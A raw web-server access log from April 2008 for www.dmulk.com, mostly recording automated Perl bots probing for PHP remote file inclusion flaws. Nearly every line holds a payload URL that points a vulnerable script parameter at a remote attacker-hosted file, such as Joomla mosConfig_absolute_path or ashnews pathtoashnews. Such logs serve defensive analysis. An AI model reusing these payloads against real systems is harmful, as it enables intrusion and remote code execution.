195.155.232.37 - - [30/Apr/2008:10:50:20 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:50:21 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.163 - - [30/Apr/2008:10:50:30 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.107 - - [30/Apr/2008:10:50:31 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.31.61.43 - - [30/Apr/2008:10:50:33 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://jentshin.new21.org/zboard_eng//data/cmd/filesukses.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.95.45 - - [30/Apr/2008:10:50:38 -0700] "GET /logs/access_080119.log//?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:50:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:10:50:52 -0700] "GET //skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.127.253.161 - - [30/Apr/2008:10:50:54 -0700] "GET /logs/access_080118.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [30/Apr/2008:10:50:57 -0700] "GET /logs/announcements.php?phpraid_dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [30/Apr/2008:10:50:57 -0700] "GET /announcements.php?phpraid_dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.20 - - [30/Apr/2008:10:51:02 -0700] "GET /logs/access_070711.log HTTP/1.1" 200 43580 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:10:51:57 -0700] "GET /logs/access.log/index.php?body=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:10:51:58 -0700] "GET /logs/index.php?body=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:52:34 -0700] "GET /logs/access_080223.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:52:34 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:52:35 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.173.74 - - [30/Apr/2008:10:52:38 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:52:45 -0700] "GET /logs/access_080121.log//components/com_simpleboard/image_upload.php?sbp=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:10:52:46 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:10:52:56 -0700] "GET /logs/access_080223.log/index.php?body=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:53:25 -0700] "GET /logs/access_080324.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:10:53:27 -0700] "GET /logs/access_080321.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:10:53:28 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.173.74 - - [30/Apr/2008:10:53:32 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [30/Apr/2008:10:53:32 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [30/Apr/2008:10:53:33 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.205.17 - - [30/Apr/2008:10:53:37 -0700] "GET /index.php?sayfa=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:53:45 -0700] "GET /logs/access_080223.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:53:45 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:53:46 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:54:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:10:55:03 -0700] "GET /logs/access_080222.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:10:55:14 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:55:15 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.147.66 - - [30/Apr/2008:10:55:15 -0700] "GET /modules/My_eGallery/index.php?basepath=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:10:55:20 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:55:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:55:20 -0700] "GET //skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:55:23 -0700] "GET /logs/access_080225.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:10:55:25 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.84.188.7 - - [30/Apr/2008:10:55:30 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:55:48 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.110.147.194 - - [30/Apr/2008:10:55:58 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [30/Apr/2008:10:55:58 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [30/Apr/2008:10:55:59 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:56:11 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:56:11 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:56:11 -0700] "GET //ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:56:11 -0700] "GET //ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:56:12 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:56:12 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:56:19 -0700] "GET /logs/access_071224.log//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:56:19 -0700] "GET //library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:56:32 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:56:32 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:10:56:33 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:10:56:34 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:10:56:34 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:56:34 -0700] "GET /logs//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:56:34 -0700] "GET //library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:10:56:35 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:10:56:36 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [30/Apr/2008:10:56:36 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:56:50 -0700] "GET /logs//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:56:50 -0700] "GET //library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:56:54 -0700] "GET //ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:56:54 -0700] "GET //ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:56:56 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://www.brokencomplex.com/phpBB/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:56:59 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:57:00 -0700] "GET //ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:57:09 -0700] "GET /logs/access_071224.log//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:57:09 -0700] "GET //library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [30/Apr/2008:10:57:09 -0700] "GET /logs//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:10:57:14 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [30/Apr/2008:10:57:24 -0700] "GET /logs/access_071224.log//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.53.240.146 - - [30/Apr/2008:10:57:24 -0700] "GET //library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:57:27 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:57:28 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:57:29 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:57:31 -0700] "GET /logs/access_071224.log//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:57:31 -0700] "GET //library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:57:34 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:57:43 -0700] "GET /logs/access_080321.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:57:44 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:10:57:44 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.240.146 - - [30/Apr/2008:10:57:55 -0700] "GET /logs//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [30/Apr/2008:10:57:55 -0700] "GET //library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.107 - - [30/Apr/2008:10:58:05 -0700] "GET /logs/access.log HTTP/1.0" 200 242633 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:58:13 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:10:58:13 -0700] "GET //ashnews.php?pathtoashnews=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:10:58:28 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:58:47 -0700] "GET /logs/contact.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:10:58:47 -0700] "GET /contact.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:10:58:51 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [30/Apr/2008:10:58:53 -0700] "GET /logs/access_071224.log//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [30/Apr/2008:10:58:53 -0700] "GET //library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [30/Apr/2008:10:58:53 -0700] "GET /logs//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:10:58:56 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:10:59:02 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:59:02 -0700] "GET /logs/access_071224.log//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:59:02 -0700] "GET //library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:10:59:03 -0700] "GET /logs//library/editor/editor.php?root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:10:59:17 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:10:59:17 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.27.59.13 - - [30/Apr/2008:10:59:47 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/cmd182182/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:10:59:57 -0700] "GET /logs/access_080306.log/start.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:00:00 -0700] "GET /start.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:00:04 -0700] "GET /logs/start.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [30/Apr/2008:11:00:29 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:00:29 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.107.122 - - [30/Apr/2008:11:00:29 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:00:29 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.107.122 - - [30/Apr/2008:11:00:29 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:00:29 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:00:44 -0700] "GET /logs/access_080129.log/start.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:11:01:26 -0700] "GET /logs/access.log/view.php?pag=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:11:01:26 -0700] "GET /view.php?pag=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [30/Apr/2008:11:01:27 -0700] "GET /logs/view.php?pag=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:01:27 -0700] "GET /logs/access_080220.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
